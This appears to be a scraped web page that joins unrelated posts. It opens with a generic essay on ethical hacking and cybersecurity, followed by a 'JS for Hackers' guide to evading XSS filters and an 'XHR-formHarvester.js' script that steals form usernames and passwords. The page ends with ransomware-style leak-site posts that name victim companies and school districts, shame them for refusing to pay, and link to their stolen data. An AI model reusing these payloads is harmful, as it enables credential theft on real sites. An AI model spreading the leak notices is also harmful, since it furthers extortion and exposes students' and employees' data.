What is Ethical Hacking And Why Cybersecurity is Important now?

 Cyberattacks are now so common, recent reports show that hackers attack a computer in the US every 39 seconds! Once an attack happens millions of people could be harmed. State-run organizations can be shut down, services can’t be provided to citizens. Case in point, the city of Atlanta was attacked using the infamous SamSam ransomware. The attackers asked for a ransom of $51,000. The SamSam ransomware was so harmful that the city of Atlanta was offline for five days. This caused several significant citywide operations being halted. It ended up having a recovery cost of $17 million. Businesses face over 4000 hacks every single day using ransomware alone.

What Is Ehical Hacking?

When people hear about the term hacking, they might think that someone is infecting their computer system using viruses, stealing their money, or crashing a network. Most people do not know that ethical hackers are the person who is hired by the company. They make an investigation into a company’s system in order to find any weakness and bring them the business’s attention. Ethical Hacking is considered to be an investment in which the company in this modern and digital world cannot afford to do without. Need to learn more about this? You have to keep on reading the upcoming sections.

Can hackers help the business?

From countries all over the world, every business is spending millions of dollars in order to keep the hackers out of their computers. It might seem that counterintuitive that some industries are greeting the hackers with their open arms. It looks strange that it is really important to have ethical hackers in order to identify some weak points in their Cyber Defenses. The ethical hackers will be creating more reliable as well as more resilient networks.

Why Cybersecurity Is Important Now?

1 – CYBERATTACKS AFFECT ALL PEOPLE

Cyberattacks can happen on a global scale as well with hackers breaching government organizations. The National Cyber Security Centre (NCSC) warns businesses and citizens that Russia is exploiting network infrastructure devices such as routers around the world. The aim is to lay the groundwork for future attacks on critical infrastructure such as power stations and energy grids.

It is such a threat that nuclear plants can be attacked causing a nuclear disaster with millions of lives lost. In Iran, one of the nuclear facilities were attacked by a malicious computer worm, Stuxnet, that ruined one-fifth of Iran’s nuclear centrifuges. These cyber worms caused centrifuges to heat up and may have caused an explosion costing human lives.

2 – THE FAST CHANGES IN TECHNOLOGY WILL CAUSE A BOOM IN CYBERATTACKS

Faster speed of broadband service.

With the advent of 5G network. According to The Brookings Institute, “5G networks thus create a greatly expanded, multidimensional cyberattack vulnerability. It is this redefined nature of networks—a new network “ecosystem of ecosystems”—that requires a similarly redefined cyber strategy.” Further stating that the increase in cyber vulnerabilities of software, it would be difficult to retool how organizations would secure the most important network of the 21st century.

Better technology that can automate the cyberattack.

The advent of modern technologies such as IoT is exponentially increasing the number of connected devices to the extent that there will be around 200 billion connected devices by the end of 2020. Cyberwarriors are increasing their knowledge while hackers can now utilize artificial intelligence and machine learning to trigger automated cyberattacks that can easily compromise secure systems without any human intervention. These automated cyberattacks pose a global scare and can be done on a mass volume.

More use of cloud computing.

According to the latest worldwide market study by Canalys, cybersecurity solutions for public cloud and ‘as a service’ accelerated in the first quarter of 2019. Those deployment models collectively grew 46 percent year-on-year. The GAO Finds Cybersecurity Risks as Agencies Increase Cloud Use. Federal agencies are increasingly using cloud computing services and the Office of Management and Budget (OMB) requires them to use the Federal Risk and Authorization Management Program (FedRAMP) to authorize use.

3 – CYBERSECURITY THREATS FACED BY INDIVIDUALS

Not only do nations and businesses face threats from the actions and intentions of hackers, but individuals face many risks as well. Identity theft is a huge issue, where hackers steal an individual’s personal information and sell it for profit. This also puts the personal safety of an individual and his or her family at risk. This happened numerous occasions and millions of dollars lost at the expense of the victim. In other cases, the hackers use blackmail and extortion after stealing their identity and demand ransom money to take no further action. This is especially true for high profile identity theft cases of celebrities or people with high net worth. Hackers have attacked household camera devices like the Ring and invade other people’s privacy. This causes major privacy concerns and hackers can speak to individuals that live inside the home, and make ransom demands.

4 – CYBER CONCERNS MAY RESULT IN INCREASED REGULATIONS AND LEGISLATION

With cybersecurity threats increasing new laws can be placed to protect the consumer from potential attacks. This would mean that increased regulations and legislation may soon become a reality. Harsher penalties need to be placed on perpetrators of the attack. Citizens need to be made aware of laws passed and make sure that their businesses comply with the laws.

The world is your Oyster

As an ethical hacker, you have the liberty to work for whichever industry you want. You can work for one of the Fortune 500 or even start a small venture on your own. Moreover, for those who aspire to travel the world, ethical hacking might be the right start. The reason being that on the global scale, Cyber attacks are on an all-time ride and are outpacing the supply of ethical hackers. Thus, there are plenty of opportunities for cybersecurity professionals.

Conclusion

Certainly, by now, you must be aware of the importance of learning Ethical Hacking. In the booming area of the cyber world, knowing about Ethical Hacking and other technical terms can help you prepare better for millions of trending jobs

Read More

JS (Javascript) For Hackers

 

What can you do if you can’t use eval()?

In Javascript you can store references to native functions in variables so for example you can do the following:-

1

x=eval; 

2

x();// calls eval

Geko based browsers also allow you to call the eval function like this:-

1

0['eval']('alert(/XSS/)')

So you can do stuff like, use your imagination:-

1

0['ev'+'al']('alert(/XSS/)');

How do I get round using certain characters/words?

Javascript supports various encoding which allows you to represent different characters. So the following unicode example creates the eval and alert combination:-

1

alert('\141\154\145\162\164\050\061\051')

So \141 translates to ‘a’ etc, when you have a string in javascript by using “” or ” you can use unicode characters, when javascript encounters the ‘\’ it will convert the character depending on it’s character code.

Hex decimal encoding can also be used like the following:-

1

alertString = 'a\x6cert(1)';

You can also use eval to convert the character for you, for example the following produces the letter ‘a’:-

1

charNumber = 141;

2

stringQuote = "'";

3

backslash = "\\";

4

alert(eval(stringQuote + backslash + charNumber + stringQuote));

How do you call anonymous functions?

Javascript allows you to call functions when you use ‘()’ as you already know, but you can also use it to call anonymous functions like the following:-

1

new Function('alert(1)')();

The code above creates a new anonymous function and passes the string ‘alert(1)’ which is embedded into the newly created function, it then calls executes the function. You can also combine the techniques mentioned, like using different characters encodings to pass the string information , you also don’t need to specify ‘new’ e.g.

1

Function('a\x6cert(1)')();

What can you use as variable names?

Javascript isn’t very strict and is pretty lax when it comes to variables names for example the ‘_’ character is allowed as a variable name or even a ‘$’ can be used as a variable name, even different character sets are allowed for variable names.

How can you create a string?

Strings are defined using String(), ” and “” etc. What you might not have known though is that regular expressions can also be used to create a string, like the following examples:-

1

newString = /XSS/.source;

2

​

3

newString = /XSS/ + '';

4

newString = newString[1] + newString[2] + newString[3];

I really need this character but it’s not allowed, how do I get it?

Think around the problem, rather than try to access the character directly get the information from another source. Like for example say you wanted the colon character and you tried urlencodings and various character encodings, you can use the URL property to gain this information. Example:-

1

alert(document.URL.substr(4, 1));

I like the document.URL technique, what else is possible using similar techniques?

Surprisingly often you don’t even need to call the document object to access some functions, so URL is available within the context of the HTML element:-

1

<a href="http://www.crackcodes.xyz" target="_blank" rel="noreferrer noopener">Test</a>

Are there any other ways of executing javascript in CSS?

Firefox has a few features which allow unusual Javascript execution, among them is the -moz-binding css extension which allows you to link XML documents using CSS. Here is an example:-

1

Test

2

​

3

​

4

​

How can I use XML within Javascript?

Firefox now supports XML in javascript code, you can just include the tags like this:-

1

testXML = <s>Test XML string</s>;

2

alert(textXML.text());

XHR-formHarvester.js

1

<script>

2

username = document.forms[0].elements[0].value;

3

password = document.forms[0].elements[1].value;

4

window.setTimeout(function(){ 

5

var req = new XMLHttpRequest();

6

req.open("GET", "http://localhost:8080/?username="+username+"&password="+password+"GETIT?", true);

7

req.send();

8

} , 10000);

9

</script>

Read More

Sadbhav Engineering Hacked

 Sadbhav Engineering Limited, established in 1988 by Mr. Vishnubhai Patel, is counted among the leading Infrastructure companies of India. Over the years, Sadbhav has succeeded in powerfully anchoring itself in the Indian Infrastructure sector and today enjoys a solid reputation in the Infrastructure development industry. Sadbhav has been involved in carrying out landmark infrastructure projects in India and each new endeavor of the company has the ultimate goal of enhancing the quality of life for people across the country and creating new opportunities without compromising on Work Quality and Punctuality. Sadbhav's business currently focuses on Infrastructure projects which include Construction of Roads & Highways, Bridges, Irrigation supporting infrastructure and Mining. Today Sadbhav has successfully constructed more than 4200 Lane Kms. of Roads and Highways (both National and State Highways) while 3500 Lane Kms. are under various stages of construction. Sadbhav has done work for/withhighly reputable clients like NHAI, Sardar Sarovar Narmada Nigam, Coal India, GIPCL, GHCL, L&T, HCC, Punj Lloyd etc. Sadbhav had incorporated Sadbhav Infrastructure Project Limited (SIPL), as a subsidiary, back in 2007 as an asset holding company for Road & Other Infrastructure BOT Projects.

Leak date:
27/11/2021 14:45:30

Leak size (Gb):
0.21

Read More

Flagship Companies Group, LLC Hacked

 Flagship Companies Group, LLC (“Flagship”), is a diverse real estate and investment company with interests in residential and commercial real estate, self-storage, studio salons, and green energy. Company www.flagshipcompaniesgroup.com does not care about the safety of its employees. Having refused to audit the network security, we are forced to publish this information here.100 years of the company’s work have not affected their cybersecurity in any way. By how much critical data has been successfully compromised, financial data, accounting data, personal data of employees, etc. Data: https://mega.nz/folder/FI4nFK5Y#qNjwBRya_1uWgj-qnAO0hQWe provide a full network dump on request.

Publish Date:
18/11/2021 00:00:00

Read More

Stonington schools Hacked

 District is comprised of four schools that serve approximately 2020 students from across the Stonington community including the borough of Stonington, the villages of Pawcatuck, Lord’s Point, and Wequetequock, and the eastern halves of Mystic and Old Mystic. The two newly renovated and expanded elementary schools, Deans Mill School and West Vine Street School, serve students in grades preK-5. http://www.stoningtonschools.org was attacked by hackers. As a result of the security incident, personal data of students, employees and financial documents of the school got into the network. Management refused a security audit.The negligence of the management caused the information leak.  

Publish Date:
18/11/2021 00:00:00

Read More

AISD Hacked

 Allen ISD is a nationally recognized public school district providing outstanding educational opportunities for elementary and secondary students. The award-winning district serves the majority of the city of Allen, Texas, as well as sections of Parker and McKinney. The suburban community is located 23 miles north of Dallas. http://www.allenisd.org was attacked by our team. We really wanted to solve this problem in a good way, but Allen’s management decided to do it differently. They refused to pay money and conduct a security audit. As a result, a number of leaks of their private information of schoolchildren, teachers, parents and others

Publish Date:
18/11/2021 00:00:00

Read More

Starline Hacked

 Starline Supply (starlinesupply.com) is the supplier of choice for school districts, office buildings, state and federal accounts, health care, and cleaning professionals. They are provide quality products and personalized service at a competitive price. The company did not want to accept our conditions in order to conduct a security audit and save its data. As a result, there was a data leak concerning the personal data of employees and business conduct. Competitors are already excited about it. Starline is already feeling the pressure from them. Data: https://mega.nz/folder/YchBiATA#FpjVBhrrrbcOurQTqta0SAWe provide a full network dump on request.

Publish Date:
19/11/2021 00:00:00

Read More